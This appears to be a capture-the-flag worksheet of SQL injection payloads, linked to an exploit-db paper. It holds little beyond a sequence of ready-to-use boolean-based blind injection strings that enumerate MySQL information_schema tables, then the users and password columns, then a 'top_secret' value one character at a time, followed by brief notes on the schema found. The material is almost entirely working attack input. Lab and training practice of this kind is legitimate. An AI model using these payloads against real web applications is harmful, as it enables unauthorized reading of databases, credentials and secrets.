https://www.exploit-db.com/papers/13045/



hello' OR '1' = '1' order by 2 --

hello' OR '1' = '1' union all select table_name from information_schema.tables --


hello' OR '1' = '1' and substring(@@version,1,1)=5 --


hello' OR '1' = '1' and (select 1)=1 --

hello' OR '1' = '1' and (select 1 from users limit 0,1)=1 --

hello' OR '1' = '1' and (select substring(concat(1,user),1,1) from users WHERE user='admin' limit 0,1)=1 --

hello' OR '1' = '1' and (select substring(concat(1,table_name),1,1) from INFORMATION_SCHEMA.TABLES limit 0,1)=1 --

hello' OR '1' = '1' and (select substring(concat(1,table_name),1,1) from INFORMATION_SCHEMA.columns WHERE column_name = 'user' limit 0,1)=1 --

hello' OR '1' = '1' and (select substring(concat(1,table_name),1,1) from INFORMATION_SCHEMA.columns WHERE column_name = 'value' limit 0,1)=1 --

hello' OR '1' = '1' and (select substring(concat(1,table_name),1,1) from INFORMATION_SCHEMA.TABLES WHERE table_name = 'values' limit 0,1)=1 --

hello' OR '1' = '1' and (select substring(table_name,1,1) from INFORMATION_SCHEMA.columns WHERE column_name = 'password' limit 0,1)='u' --

hello' OR '1' = '1' and (select substring(table_name,1,1) from INFORMATION_SCHEMA.columns WHERE column_name = 'value' limit 0,1)='u' --

hello' OR '1' = '1' and (select substring(table_name,2,1) from INFORMATION_SCHEMA.columns WHERE column_name = 'value' limit 0,1)='e' --

hello' OR '1' = '1' and (select substring(table_name,3,1) from INFORMATION_SCHEMA.columns WHERE column_name = 'value' limit 0,1)='e' --

hello' OR '1' = '1' and (select substring(table_name,4,1) from INFORMATION_SCHEMA.columns WHERE column_name = 'value' limit 0,1)='e' --

hello' OR '1' = '1' and (select CHAR_LENGTH(table_name) from INFORMATION_SCHEMA.columns WHERE column_name = 'value' limit 0,1)=3 --


hello' OR '1' = '1' and (select CHAR_LENGTH(table_name) from INFORMATION_SCHEMA.columns WHERE column_name = 'password' limit 0,1)=5 --

hello' OR '1' = '1' and (select LOWER(substring(table_name,4,1)) from INFORMATION_SCHEMA.columns WHERE column_name = 'value' limit 0,1)='h' --


hello' OR '1' = '1' and (select LOWER(substring(table_name,6,1)) from INFORMATION_SCHEMA.columns WHERE column_name = 'value' limit 0,1)='e' --


hello' OR '1' = '1' and (select LOWER(substring(value,1,1)) from top_secret limit 0,1)='f' --


hello' OR '1' = '1' and (select CHAR_LENGTH(value) from top_secret limit 0,1)=10 --





SELECT table_name FROM information_schema.columns WHERE column_name = ‘username’;

(select 1 from users limit 0,1)=1


users
  user, password



  top_secret
  value

  FLAG{printable ASCII text}
